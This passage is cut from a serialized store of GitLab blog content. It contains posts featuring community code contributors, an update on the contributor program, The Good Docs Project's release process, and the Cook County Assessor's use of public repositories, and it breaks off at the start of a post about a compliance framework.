}",{"title":1579,"description":1580,"authors":1584,"heroImage":1192,"date":1585,"body":1586,"category":10,"tags":1587},[704],"2018-10-04","\nFor this month's blog post, we're featuring a new contributor [Luke Picciau](https://gitlab.com/Qwertie), who started contributing to GitLab a few months ago.\n\n### When did you first contribute to GitLab?\nMy first contribution was in July 2018, with my MR to [add a button for regenerating 2FA codes](https://gitlab.com/gitlab-org/gitlab-ce/merge_requests/20295).\n\n### Why and how did you decide to contribute to GitLab?\nI have been using GitLab pretty heavily since 2014. I decided to start contributing in order to practice developing features on a large project. Because I am very familiar with features of GitLab from the user perspective, navigating the code was easy and I was able to start adding new features quickly.\n\n### Which area(s) of the GitLab product are you interested in contributing to?\nI’d love to look into the new [Web IDE](https://docs.gitlab.com/ee/user/project/web_ide/) and see what improvements could be made, as I see this as a useful tool. Personally, I’d like to use it to write posts for my static site and see the compiled result in my browser as well.\n\n### Can you tell us what you do professionally (or academically if you're going to school)?\nI am a full stack web developer. I primarily use Rails and VueJS. Currently I am also studying for a Bachelor of Information Technology at the University of South Australia. I’m also building an open source website for fitness tracking and analytics of GPS recordings. It’s not quite ready to use yet, but I am pushing regular updates to [the repo](https://gitlab.com/pikatrack/pikatrack).\n\n### What do you like to do when you're not working or studying?\nI’ll often be helping open source projects such as mapping the local area on [Open Street Map](https://www.openstreetmap.org). I also love to go down to the mountain bike parks around Adelaide.\n\n### Can you tell us where you live and what you like about your area?\nI live in [Adelaide, South Australia](https://www.google.com/maps/place/Adelaide+SA,+Australia/@-35.0278392,134.1260638,6z/). My favorite thing about the area is living close to so many national parks and amazing mountain bike trails which give endless exploration possibilities.\n\n![Luke on his mountain bike](https://about.gitlab.com/images/blogimages/Luke_Picciau_mountain_biking_new.jpg){: .shadow.small.center}\n\n### What advice do you have for others who may be interested in contributing to GitLab?\nOne of the things I find most useful is using an IDE or text editor with “go to definition” support. This allows you to click on function and class names and be taken to the place where they are defined. This, in my opinion, is an essential feature for working on a codebase as large as GitLab, especially in a language like Ruby, where it can be difficult to work out where things have been imported from. I personally use [RubyMine](https://www.jetbrains.com/ruby/), but I have been told [Vim](https://www.vim.org/) can also be set up with good Ruby support. Another tip I have is if you get part way through making a change and get stuck on something or need advice on what should be done, commit the changes and [create a merge request](https://docs.gitlab.com/ee/user/project/merge_requests/creating_merge_requests.html#doc-nav) with what you have done and any questions you have. Someone should reply to the merge request to help you get the changes finished and ready for merge.\n\n## Interested in learning how you can contribute?\n\nA good place to start is the [Contributing to GitLab page](/community/contribute/), where you can learn how you can contribute to GitLab code, documentation, translation, and UX design.\n\nIf you have any questions, you are always welcome to reach me at rpaik@gitlab.com.\n\n_Note: This post is part of [a series featuring people who contribute to GitLab](/blog/tags.html#contributors)._\n",[267,779,9,708],{"slug":1589,"featured":6,"template":689},"contributor-post-luke","content:en-us:blog:contributor-post-luke.yml","Contributor Post Luke","en-us/blog/contributor-post-luke.yml","en-us/blog/contributor-post-luke",{"_path":1595,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1596,"content":1601,"config":1606,"_id":1608,"_type":14,"title":1609,"_source":16,"_file":1610,"_stem":1611,"_extension":19},"/en-us/blog/contributor-post-siemens",{"title":1597,"description":1598,"ogTitle":1597,"ogDescription":1598,"noIndex":6,"ogImage":1192,"ogUrl":1599,"ogSiteName":673,"ogType":674,"canonicalUrls":1599,"schema":1600},"GitLab Code Contributor: Alexis Reigel","Alexis Reigel shares his experience as a GitLab contributor on behalf of Siemens.","https://about.gitlab.com/blog/contributor-post-siemens","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"GitLab Code Contributor: Alexis Reigel\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Ray Paik\"}],\n        \"datePublished\": \"2018-12-18\",\n      }",{"title":1597,"description":1598,"authors":1602,"heroImage":1192,"date":1603,"body":1604,"category":10,"tags":1605},[704],"2018-12-18","\nFor this month's blog post, we're featuring [Alexis Reigel](https://gitlab.com/koffeinfrei). Alexis was also an [MVP for GitLab 9.5 and 10.8](/community/mvp/).\n\n![Alexis Reigel](https://about.gitlab.com/images/blogimages/Alexis_Reigel.jpeg){: .shadow.small.center}\n\n### How did you get involved with contributing to GitLab?\n\nMy Siemens colleagues have been using GitLab since 2013 with [GitLab 5.2](/releases/2013/05/22/gitlab-5-dot-2-released/). The *[upstream first](https://www.redhat.com/blog/verticalindustries/why-upstream-contributions-matter-when-developing-open-source-nfv-solutions/)* principle is important at Siemens, as they don't want to maintain local patches/forks of software. I was hired to contribute features to GitLab that are needed at Siemens, and this give-and-take process between contributors and users is what is great about open source software. My first contribution was the ability to add a [custom brand header logo in emails](https://gitlab.com/gitlab-org/gitlab-ce/merge_requests/9049), which I created on Feb. 7, 2017 and was merged on Feb. 22, 2017.\n\n### What was your experience with the first merged MR?\n\nThere was no controversy with my first MR, and therefore not much debate before it was merged. The review was very quick and the relevant people chimed in right from the start. For some of the later, more complicated merge requests, it was not always this straightforward. Depending on how complicated the MR is and how many people from GitLab participate, the process may take longer and generate a lot of discussions.\n\n### What advice do you have for others who may be interested in contributing to GitLab? In particular, any insights you can share with current GitLab customers who may be thinking about making code contributions?\n\nFirst, I recommend reviewing existing MRs and issues before submitting an MR. In many cases, there are already discussions and potential solutions for a certain feature or bug fix. It's also helpful to find out [who from GitLab](/company/team/) is relevant or responsible for a certain area so you can ping the right person from the start.\n\nThe initial contribution should always be a minimal solution or what GitLab calls a [\"Minimum Viable Change (MVC)\"](/handbook/product/product-principles/#the-minimal-viable-change-mvc), because the solution will often change with feedback. The initial contribution should be considered a starting point for collaboration between the contributor and GitLab team-members.\n\nIn some cases, a contributor may need to be patient with their MR, as depending on the topic and complexity it may take some time to move things forward. The people from GitLab are always very kind and friendly so the discussions are respectful.\n\n### Do you have other colleagues at Siemens who also contribute to GitLab? How do you go about planning and working on your contributions?\n\nYes, there are several colleagues who are active within the GitLab community and you will see [Siemens mentioned in MRs](https://gitlab.com/gitlab-org/gitlab-ce/merge_requests/?scope=all&utf8=%E2%9C%93&state=merged&search=siemens).\n\nMy Siemens colleagues collect issues and feature requests internally and prioritize them based on how important and urgent they are. After discussing feature requests with coworkers to make sure we have a common understanding of the intended functionality, I start to work on the issues according to their priority. I have a lot of freedom and trust from Siemens on what the solution I contribute should look like.\n\n### What do you like to do when you're not working?\n\nI work on several other free and open source projects such as [Metaflop](https://www.metaflop.com/), [Mykonote](https://github.com/panter/mykonote/blob/master/README.md), and others in my spare time. Apart from that, I like spending time with my family and friends. If there's any time left, I make and listen to music or watch a movie or two.\n\n### Anything else you want to share with the community?\n\nGitLab is a great product and is one of the friendliest and healthiest open source communities. Contributing to such a large project may seem daunting at first, but will pay off in the end. Your contribution will be appreciated by GitLab team-members as well as everyone who uses the product.\n\n## Interested in learning how you can contribute?\n\nA good place to start is the [Contributing to GitLab page](/community/contribute/), where you can learn how you can contribute to GitLab code, documentation, translation, and UX design.\n\nIf you have any questions, you are always welcome to reach me at rpaik@gitlab.com.\n\n_Note: This post is part of [a series featuring people who contribute to GitLab](/blog/tags.html#contributors)._\n",[267,779,9,708],{"slug":1607,"featured":6,"template":689},"contributor-post-siemens","content:en-us:blog:contributor-post-siemens.yml","Contributor Post Siemens","en-us/blog/contributor-post-siemens.yml","en-us/blog/contributor-post-siemens",{"_path":1613,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1614,"content":1619,"config":1624,"_id":1626,"_type":14,"title":1627,"_source":16,"_file":1628,"_stem":1629,"_extension":19},"/en-us/blog/contributor-post-vitaliy",{"title":1615,"description":1616,"ogTitle":1615,"ogDescription":1616,"noIndex":6,"ogImage":1192,"ogUrl":1617,"ogSiteName":673,"ogType":674,"canonicalUrls":1617,"schema":1618},"GitLab Code Contributor: Vitaliy Klachkov","Core Team member Vitaliy Klachkov shares how he started contributing to GitLab.","https://about.gitlab.com/blog/contributor-post-vitaliy","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"GitLab Code Contributor: Vitaliy Klachkov\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Ray Paik\"}],\n        \"datePublished\": \"2018-08-08\",\n      }",{"title":1615,"description":1616,"authors":1620,"heroImage":1192,"date":1621,"body":1622,"category":10,"tags":1623},[704],"2018-08-08","\nWelcome to our new blog series featuring code contributors from the GitLab community! This blog will highlight the wonderful contributions made by GitLab community members and will hopefully inspire others to contribute to GitLab. For the first blog post, we are happy to welcome [Vitaliy “blackst0ne” Klachkov](https://gitlab.com/blackst0ne), who has been chosen as a [release MVP](/community/mvp/) three times!\n\n### How long have you been contributing to GitLab?\n\nI've been contributing since August 2016.\n\n### Why and how did you decide to contribute to GitLab?\n\nI read a news article about a new GitLab release and I didn’t even know what GitLab was back then. There was also a discussion on an example of a Rails-based project with a good codebase, and people suggested taking a look at GitLab.\n\nI was intrigued and decided to take a closer look at GitLab. I actually found\nroom for improvement in the codebase so I started pushing a few merge requests (MRs). I received responses within 1-2 days and I was very impressed. With some of the other communities, I’m used to waiting weeks for feedback.\n\nSo, I kept submitting more merge requests and so far, I have 227 merged MRs. I’m proud that I’m one of the top 50 contributors among 2000+ GitLab [code contributors](http://contributors.gitlab.com/) that include GitLab employees.\n\n### Which areas of the GitLab product do you contribute to?\n\nMostly it has been backend changes, but many of my MRs touched the frontend as well. I spent my time bringing popular features (e.g. [squash and merge to CE](https://docs.gitlab.com/ee/user/project/merge_requests/squash_and_merge.html#doc-nav), [mermaid support](https://docs.gitlab.com/ee/user/markdown.html#mermaid), [switch markdown engine to CommonMark](https://gitlab.com/gitlab-org/gitlab-ce/merge_requests/14835), [customizable branch name from issues](https://gitlab.com/gitlab-org/gitlab-ce/merge_requests/13884), etc.), fixing technical debts (e.g. [migrate all spinach specs to rspec](https://gitlab.com/gitlab-org/gitlab-ce/merge_requests?scope=all&utf8=%E2%9C%93&state=all&author_username=blackst0ne&label_name%5B%5D=technical%20debt&label_name%5B%5D=Quality&search=Spinach)), upgrading [GitLab to Rails 5.0](https://gitlab.com/groups/gitlab-org/-/merge_requests?scope=all&utf8=%E2%9C%93&state=all&author_username=blackst0ne&label_name%5B%5D=rails5), and many other improvements.\n\n### Can you tell us what you do professionally?\n\nI am a full-stack web developer at [GEOPHYSTECH LLC](https://geophystech.ru/). The company is focused on seismology, earthquakes, and everything related to earthquake hazards.\n\n### What do you like to do when you're not working?\n\nI’m a big fan of sports or anything that keeps my body moving, such as running, swimming, snowboarding, table tennis, volleyball, ice-blading, football, CrossFit workout, etc.\n\nI also enjoy [chess](https://lichess.org/), reading books/articles, and UX-related things. I’ve been collaborating with GitLab’s UX team.\n\n### What advice do you have for others who may be interested in contributing to GitLab?\n\nContributing to GitLab is easy. If you want the experience of being a part of a popular open source project, you are more than welcome to join the GitLab community! You can also ping me on [Twitter](https://twitter.com/blackst0ne) if you have any questions or need any help as you get started.\n\n### Do you have anything else you’d like to share?\n\nGitLab has some nice [swag](https://shop.gitlab.com/)! I’ve gotten some great ones for my release MVPs.\n\n## Interested in learning how you can contribute?\n\nA good place to start would be the [Contributing to GitLab page](/community/contribute/), where you can learn how you can contribute to GitLab code, documentation, and translation.\n\n_Note: This post is part of [a series featuring people who contribute to GitLab](/blog/tags.html#contributors)._\n",[267,779,9,708],{"slug":1625,"featured":6,"template":689},"contributor-post-vitaliy","content:en-us:blog:contributor-post-vitaliy.yml","Contributor Post Vitaliy","en-us/blog/contributor-post-vitaliy.yml","en-us/blog/contributor-post-vitaliy",{"_path":1631,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1632,"content":1637,"config":1642,"_id":1644,"_type":14,"title":1645,"_source":16,"_file":1646,"_stem":1647,"_extension":19},"/en-us/blog/contributor-program-update",{"title":1633,"description":1634,"ogTitle":1633,"ogDescription":1634,"noIndex":6,"ogImage":1348,"ogUrl":1635,"ogSiteName":673,"ogType":674,"canonicalUrls":1635,"schema":1636},"Updates from the GitLab contributor community","Here's what's happening with the wider contributor community.","https://about.gitlab.com/blog/contributor-program-update","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Updates from the GitLab contributor community\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Ray Paik\"}],\n        \"datePublished\": \"2019-04-17\",\n      }",{"title":1633,"description":1634,"authors":1638,"heroImage":1348,"date":1639,"body":1640,"category":10,"tags":1641},[704],"2019-04-17","\n\nI joined GitLab in June 2018, and it's been exciting to work with our wider community of contributors.\nOne of the first things I did when I started was to look into community metrics to get a better\nunderstanding of the community, and here are a couple of numbers I'd like to share:\n\nSince 2016, about 15 percent of merged MR for the [GitLab Community Edition](https://gitlab.com/gitlab-org/gitlab-ce)\nwere contributed by community members (see the chart below). In addition, we had over 200\nfirst-time contributors to GitLab between the 11.5 and 11.9 releases, and it's been fun seeing [people\ncelebrate their first merged MRs on Twitter](https://twitter.com/hashtag/myFirstMRmerged?src=hash).\n\n![Community contribution to CE](https://about.gitlab.com/images/blogimages/contributor-pgm-blogpost/CE_Merged_MRs_since_Jan_2016.png){: .medium.center}\n\nIt's definitely fun being part of a growing community, and I wanted to provide a quick update\non a number of items that we have been working on.\n\n## Core Team updates\n\n### Monthly calls\n\nThe [Core Team](/community/core-team/) consists of individuals who have made sustained contributions\nto GitLab and their mission is to represent the wider GitLab community.\nI started scheduling a regular call with Core Team members\nand I've been very impressed with the quality of discussions we have each month.\nCore Team members helped improve responsiveness to community contributions, Hackathons,\nand even revamped the Core Team page itself. Everyone is welcome to join the call, and the\nlogistics, notes, slides, etc. are available on the [Monthly Core Team meeting page](https://gitlab.com/gitlab-core-team/general/wikis/monthly-core-team-meeting).\nIf you want to watch recordings of previous meetings, you can check out the [Core Team meeting playlist](https://www.youtube.com/playlist?list=PLFGfElNsQthZ12EUkq3N9QlThvkf3WGnZ).\n\n![GitLab Core Team](https://about.gitlab.com/images/blogimages/contributor-pgm-blogpost/Core_Team.png){: .shadow.small.center}\n\n### New additions to the team\n\nThere have also been changes to the Core Team composition. To provide additional support,\nthere will be up to two GitLab company team members forming part of the\nCore Team. So, I'm excited to share that [Rémy Coutable](https://gitlab.com/rymai) and\n[Winnie Hellmann](https://gitlab.com/winh) are now members of the Core Team.\nWinnie was actually a Core Team member prior to joining GitLab, and Rémy has been working\nwith Core Team members for the past several years, so they're perfect additions to the team.\n\nIn addition to the two GitLab team-members, [Ben Bodenmiller](https://gitlab.com/bbodenmiller)\nand [George Tsiolis](https://gitlab.com/gtsiolis) joined the Core Team in the past several months.\nAs you will see in the next section, both Ben and George were two of the top code contributors in 2018.\n\n## Recognizing regular contributors\n\nIn addition to the Core Team members, we also have dozens of members of the wider community\nmaking regular contributions to GitLab. In order to recognize their work, I started a\n[top contributors page](/community/top-annual-contributors/index.html) and\nplan to update this each year to highlight regular contributors. Following examples from other\nopen source communities, we now have badging for three different levels of contributions.\nShortly, we will be sending out special GitLab merchandise to these contributors so they can\ncelebrate their accomplishments. My hope is that we will see an increase in the number of regular\ncontributors in the years to come. In addition to the number of contributors, I also want to improve the diversity of regular contributors – whether it's gender, geography, occupation, etc. – and will start a conversation on this topic in various forums, including the Core Team meeting. \n\n![Contributor badges](https://about.gitlab.com/images/blogimages/contributor-pgm-blogpost/contributor_badges.png){: .shadow.small.center}\n\n## \"Contribute for prize\" issues\n\nIf you participated in the [Q1 Hackathon](/blog/q1-hackathon-recap/),\nyou probably remember that we highlighted an issue in each [product stage](/handbook/product/categories/)\nto encourage people to contribute for a special hackathon prize. Following the success of this\nin the Hackathon, we created a new label `Contribute for prize` to encourage community members\nto work on priority issues on an ongoing basis. You can find more information in the [contributor success handbook page](/handbook/marketing/developer-relations/contributor-success/community-contributors-workflows.html#supporting-the-wider-community-contributors)\nand I encourage everyone to [search for issues with the label `Contribute for prize`](https://gitlab.com/gitlab-org/gitlab-ce/issues?scope=all&utf8=%E2%9C%93&state=opened&label_name[]=Contribute%20for%20prize) to start working on them.\n\n## How do I get started with contributing?\n\nA good place to start is the [Contributing to GitLab page](/community/contribute/), where you can learn how you can\ncontribute to GitLab code, documentation, translation, and UX design.\n\nIf you have any questions, you are always welcome to reach me at rpaik@gitlab.com.\n\n[\"Gitlab application screengrab\"](https://unsplash.com/photos/ZV_64LdGoao) by [Pankaj Patel](https://unsplash.com/@pankajpatel) on Unsplash\n{: .note}\n",[267,779,9],{"slug":1643,"featured":6,"template":689},"contributor-program-update","content:en-us:blog:contributor-program-update.yml","Contributor Program Update","en-us/blog/contributor-program-update.yml","en-us/blog/contributor-program-update",{"_path":1649,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1650,"content":1656,"config":1663,"_id":1665,"_type":14,"title":1666,"_source":16,"_file":1667,"_stem":1668,"_extension":19},"/en-us/blog/coordinating-documentation-projects-gitlab",{"title":1651,"description":1652,"ogTitle":1651,"ogDescription":1652,"noIndex":6,"ogImage":1653,"ogUrl":1654,"ogSiteName":673,"ogType":674,"canonicalUrls":1654,"schema":1655},"Coordinating major documentation projects with GitLab","Members of The Good Docs Project explain how to plan, coordinate, and release major documentation projects using GitLab.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749669791/Blog/Hero%20Images/abstractprocess.png","https://about.gitlab.com/blog/coordinating-documentation-projects-gitlab","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Coordinating major documentation projects with GitLab\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Alyssa Rock\"},{\"@type\":\"Person\",\"name\":\"Aaron Peters, Member, Good Docs Project\"}],\n        \"datePublished\": \"2023-08-24\",\n      }",{"title":1651,"description":1652,"authors":1657,"heroImage":1653,"date":1660,"body":1661,"category":10,"tags":1662},[1658,1659],"Alyssa Rock","Aaron Peters, Member, Good Docs Project","2023-08-24","\n[The Good Docs Project](https://thegooddocsproject.dev/) recently achieved a significant milestone: releasing [version v1.0.0 of our project](https://gitlab.com/tgdp/templates/-/releases/v1.0.0). It was an exciting moment for [our community of contributors](https://go.gitlab.com/16yEa3) dedicated to improving the quality of software documentation by sharing best practices — the first time we felt confident putting our production-ready documentation templates into the world for other software projects to review, use, and help us improve.\n\nOrganizing and executing a release of this magnitude requires extensive planning and sophisticated project management tools. Luckily, our community uses GitLab, so we had everything we needed at our disposal.\n\nIn this article, we'll explain how we used GitLab to meet our goal of bringing Version 1.0 (codenamed \"Capilano\") to the world. Our release process consists of four general phases:\n* [Scheduling](#scheduling-a-release)\n* [Planning](#planning-a-release)\n* [Tracking](#tracking-a-release)\n* [Releasing](#release-day)\n\nWe'll share how we use GitLab in each of those phases to achieve a successful project release.\n\n## Scheduling a release\n[The Good Docs Project](https://about.gitlab.com/blog/meet-partner-the-good-docs-project/) releases template updates twice a year: on June 15 and December 15. Each of our releases receives both a number and a codename in honor of a famous bridge (because we're \"bridging the documentation gap for our users\"). Last December, for example, we issued [Version 0.3.0, codenamed \"Brooklyn Bridge\"](https://thegooddocsproject.dev/blog/template-release-0.3.0-using-our-own-templates/) release. In June, we finished [Version 1.0.0, which was codenamed \"Capilano\"](https://gitlab.com/tgdp/templates/-/releases/v1.0.0) for [a bridge in Canada](https://en.wikipedia.org/wiki/Capilano_Suspension_Bridge)). And now we're starting work on the [Dragon](https://gitlab.com/groups/tgdp/-/milestones/4) release, which gets its name from [a bridge on the River Han in Vietnam](https://en.wikipedia.org/wiki/Dragon_Bridge_(Da_Nang)).\n\n![The Good Docs Project Release Process](https://about.gitlab.com/images/blogimages/tgdp-release-cycle.jpg){: .shadow}\n\nOur release schedule prioritizes *work time* over *work scope*. We set goals we wish to accomplish with every release, then use the release deadline as a motivational tool to get projects done. However, we [don't delay releases](https://handbook.gitlab.com/teamops/measurement-clarity/#prioritize-due-dates-over-scope) for a particular release initiative per se. Instead, we try to accurately scope and track our release initiatives to ensure they complete in time for their desired release.\n\n## Planning a release\nFor the first month of our six-month release cycle, each of The Good Docs Project's working groups or teams determines initiatives for the cycle. They usually hold an initial brainstorming session, which involves using a synchronous collaboration tool (like Miro) to determine which ideas to include as official goals for the release. But after confirming and committing what we want to do with each release, we migrate all those objectives to GitLab, where we communicate them to the rest of the community. That process generally looks like this:\n* Open an issue in a release's respective repository and we tag it with the milestone for that release\n* Attach [scoped labels](https://docs.gitlab.com/ee/user/project/labels.html#scoped-labels) to indicate which working group is assigned to that task\n* Assign an initial [health status](https://docs.gitlab.com/ee/user/project/issues/managing_issues.html#health-status) of \"On track\"\n* Assign the issue [a weight](https://docs.gitlab.com/ee/user/project/issues/issue_weight.html) to indicate its importance\n\nThen, in a general community meeting where we end the release planning process, everyone identifies what they'll commit to, and we begin using the milestone to track progress and [a global project board to track the health status](https://gitlab.com/groups/tgdp/-/boards/5867329?milestone_title=Dragon%20release) when we do stand-ups to [report on progress](https://gitlab.com/groups/tgdp/-/milestones/4).\n\nTo prioritize effectively, we draw on guidance from our team of template product managers, who [perform extensive user research](https://tinyurl.com/template-brainstorming-report) into the templates our users or potential users think we should add to the roadmap. We attend conferences and engage with both technical writers and developers to hear what they want from our product. This team of product managers then distills this information into a long-term product roadmap that informs which template issues are strategically important to our project. We then translate that roadmap into issues in [our project backlog](https://gitlab.com/tgdp/templates/-/issues/?sort=updated_desc&state=opened&first_page_size=100).\n\n## Tracking a release\nGaining access to [GitLab's project management features](/pricing/feature-comparison/) was one of our primary motivations for adopting the platform in the first place. These features allow us to track and monitor our progress toward a release. We love that with GitLab we can manage multiple sub-projects and repositories under our organization, but still view all the issues on a \"single pane of glass.\" This allows working groups and teams to work in their individual repositories, but gives us a high-level overview of their work at the organizational level, using features like milestones and scoped labels.\n\nTo track our releases, we configure a project milestone that runs for the full release time period. The milestone shows all the initiatives we're working on, as well as our progress toward each on [an organization-wide burndown chart](https://gitlab.com/groups/tgdp/-/milestones/3#tab-issues). We use [scoped labels](https://docs.gitlab.com/ee/user/project/labels.html#scoped-labels) (labels that can only be assigned to one value at a time) on each issue to track which working group is working on that initiative. We also use GitLab's [health status feature](https://docs.gitlab.com/ee/user/project/issues/managing_issues.html#health-status) to track whether the initiative is on track or at risk of falling behind schedule. On top of that, we create a project board that helps us visualize all the project's active issues and initiatives, filtered by each working group. Our project board provides insights into the work each group is doing and gives us a sense of the release's overall progress toward our release goals.\n\nThese boards are a focal point of our weekly general meetings. We review the milestone and project board, then check in with working group and team leads to make sure their work toward the release is going well. These meetings are opportunities to identify potential blockers preventing (or threatening to prevent) the work from getting done — or to communicate if any of our earlier estimates need to be adjusted. We build some flexibility into our release planning and tracking processes in case we need to make mid-release changes or course corrections. For example, we determine which individual template projects we'll add them to a release *during the release process itself, rather than during the release planning stage we descibed earlier. Since those projects are dependent on volunteer work that can't always be controlled by the project leads, we wait to officially add them to a release until we can be certain a template project will be ready for release day.\n\n## Release day\nWhen release day finally arrives, our [Tech Team](https://thegooddocsproject.dev/who-we-are/#tech-team) meets to tag the release in the templates repository and build our artifacts, including all our zip files and tarballs for our templates. To do that, the team:\n* Verifies that all merge requests are complete\n* Creates a tag for the templates repository for the main branch and adds a tag message indicating it is for a release\nAdds a release title, tags it with our milestone for that release, confirms the date, and adds the release notes (using [our community's own release notes template](https://gitlab.com/tgdp/templates/-/releases/v1.0.0), of course) by using the `Create Release` button on the release screen\n* Creates the release; GitLab generates all the files from our repository, including zips, tarballs, and JSON artifacts\n* Publishes a link to our release and the artifacts on our website\n\nWe try to ensure we've recognized and tagged every project member who contributed directly to the templates release. That includes people who wrote templates, improved existing templates, or created examples for our templates. Then, the Tech Team publishes the artifacts and release notes to our website and publishes an announcement to all our internal and external communication channels.\n\nWe believe it's important to take breaks. For that reason, our project always takes a three-week break after release day. For those three weeks, we encourage all our project members to get some well-deserved rest and relaxation. We don't hold any meetings during this time, and we encourage people to only communicate lightly with other project members.\n\nThen we regroup in July or January — and start the release process all over again!\n\nIt's not too late to join our next release and experience this process firsthand. Just visit [The Good Docs Project community page](https://thegooddocsproject.dev/community/) to learn how to get started.\n\nThe [GitLab Open Source Partners](https://go.gitlab.com/030Ue3) are building the future of open source on GitLab. Connect with them on [Gitlab.com](https://gitlab.com/gitlab-com/marketing/community-relations/open-source-program/gitlab-open-source-partners).\n{: .note}\n",[9,267,1099],{"slug":1664,"featured":6,"template":689},"coordinating-documentation-projects-gitlab","content:en-us:blog:coordinating-documentation-projects-gitlab.yml","Coordinating Documentation Projects Gitlab","en-us/blog/coordinating-documentation-projects-gitlab.yml","en-us/blog/coordinating-documentation-projects-gitlab",{"_path":1670,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1671,"content":1677,"config":1683,"_id":1685,"_type":14,"title":1686,"_source":16,"_file":1687,"_stem":1688,"_extension":19},"/en-us/blog/creating-a-transparent-digital-democracy",{"title":1672,"description":1673,"ogTitle":1672,"ogDescription":1673,"noIndex":6,"ogImage":1674,"ogUrl":1675,"ogSiteName":673,"ogType":674,"canonicalUrls":1675,"schema":1676},"Government agency builds transparent democracy using GitLab","The Cook County Assessor’s office explains how they're using GitLab to help create a new level of government transparency.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749679611/Blog/Hero%20Images/cook-county-blog-unsplash.jpg","https://about.gitlab.com/blog/creating-a-transparent-digital-democracy","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How one government agency is creating a transparent digital democracy with GitLab\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Brein Matturro\"}],\n        \"datePublished\": \"2019-09-02\",\n      }",{"title":1678,"description":1673,"authors":1679,"heroImage":1674,"date":1680,"body":1681,"category":10,"tags":1682},"How one government agency is creating a transparent digital democracy with GitLab",[884],"2019-09-02","\n\nAt GitLab Connect Chicago, Robert Ross, chief data officer at the Cook County Assessor’s Office,\npresented the talk, “An experiment in digital democracy: How the Cook County Assessor’s\nOffice is using GitLab to reach a new level of transparency.”\n\nThe Chicago Assessor’s Office is responsible for predicting the value of over a million pieces of\nreal estate and reassessing them every three years. Record keeping has always been on paper and\nonly recently has “marginally sophisticated computer programming” been used. Now the Assessor's Office\nwants to turn the process over to software algorithms.\n\n“In a world where the computer is doing the heavy lifting, policy is code and code is policy,”\nRobert says. The algorithms used in assessing a property are dependent on a number of variables. If the\ncode variables are central to the assessment office, as it is for Cook County, it becomes\nimperative that it is made public. “[Our office] ran on a platform of fair, ethical, and\ntransparent assessments. In order to achieve that third pillar, we absolutely have to publish\nthe code that we use to value (a) house,” Robert says.\n\n## Modernizing software and viewpoints\n\nThe Assessment Office had a limited number of days to completely replicate the existing data\nformats that were in place from the previously elected office and to create a transparent\nplatform where property owners could understand how their assessment came to be. There were other\nchallenges too, such as legacy scripts, the inability to integrate older software, and zero\nassistance from the previous office.\n\nRobert and his team turned to GitLab to publish all of their code on residential modeling.\nThey have four repositories with more than 880 commits, all of which the public is able to access.\n“We’re using GitLab completely differently. Our product is your tax assessment and we have to\ndeploy the product on time because if we don’t, the entire government falls apart,” Robert says.\n“We will make mistakes and we have to document those mistakes so that we can be transparent and\ndo our jobs as well as we can.”\n\n## Creating radical policy shifts with transparency\n\nThe ability for property owners to access and own the information that creates their estate value\nhas never been done before at this level. “No county assessor has ever used a public-facing\nrepository for their work,” Robert says. In fact, establishing governing policies has customarily\nbeen done behind closed doors. Cook County has taken an experimental step towards open source\ngovernment policies. “Very few government agencies do it,” he says.\n\nThe Cook County office doesn’t want to stop there. This is just the first step in what it hopes\nare future electoral victories. “We need to demonstrate that transparency is ‘good politics’…\nif transparency becomes a successful evolutionary trait among politicians, you get more of it.”\n\nWant to hear about how Robert and the Cook County Assessment Office use GitLab? Watch his\npresentation in its entirety here:\n\n\u003C!-- blank line -->\n\u003Cfigure class=\"video_container\">\n  \u003Ciframe src=\"https://www.youtube.com/embed/K8ROmhwphMg\" frameborder=\"0\" allowfullscreen=\"true\"> \u003C/iframe>\n\u003C/figure>\n\u003C!-- blank line -->\n\nCover image by [Element5 Digital](https://unsplash.com/@element5digital) on [Unsplash](https://unsplash.com)\n{: .note}\n",[910,267,9],{"slug":1684,"featured":6,"template":689},"creating-a-transparent-digital-democracy","content:en-us:blog:creating-a-transparent-digital-democracy.yml","Creating A Transparent Digital Democracy","en-us/blog/creating-a-transparent-digital-democracy.yml","en-us/blog/creating-a-transparent-digital-democracy",{"_path":1690,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1691,"content":1697,"config":1704,"_id":1706,"_type":14,"title":1707,"_source":16,"_file":1708,"_stem":1709,"_extension":19},"/en-us/blog/creating-the-gitlab-controls-framework",{"title":1692,"description":1693,"ogTitle":1692,"ogDescription":1693,"noIndex":6,"ogImage":1694,"ogUrl":1695,"ogSiteName":673,"ogType":674,"canonicalUrls":1695,"schema":1696},"Adobe CCF becomes GitLab's open source control framework","We've implemented and adapted an open source compliance framework. Now we're sharing our process and tools so you can adapt and customize it too.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749683200/Blog/Hero%20Images/geraldo-stanislas-unsplash.jpg","https://about.gitlab.com/blog/creating-the-gitlab-controls-framework","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Turning the Adobe CCF into the GitLab Control Framework (it's all open source!)\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Jeff Burrows\"}],\n        \"datePublished\": \"2019-07-10\",\n      }",{"title":1698,"description":1693,"authors":1699,"heroImage":1694,"date":1701,"body":1702,"category":865,"tags":1703},"Turning the Adobe CCF into the GitLab Control Framework (it's all open source!)",[1700],"Jeff Burrows","2019-07-10","\nIn my previous blog post, I talked about [how GitLab went about choosing an overarching compliance framework](/blog/choosing-a-compliance-framework/) that would optimize satisfying the requirements of underlying regulatory or industry best practice requirements. Today I’m blogging about the next steps in that process, and 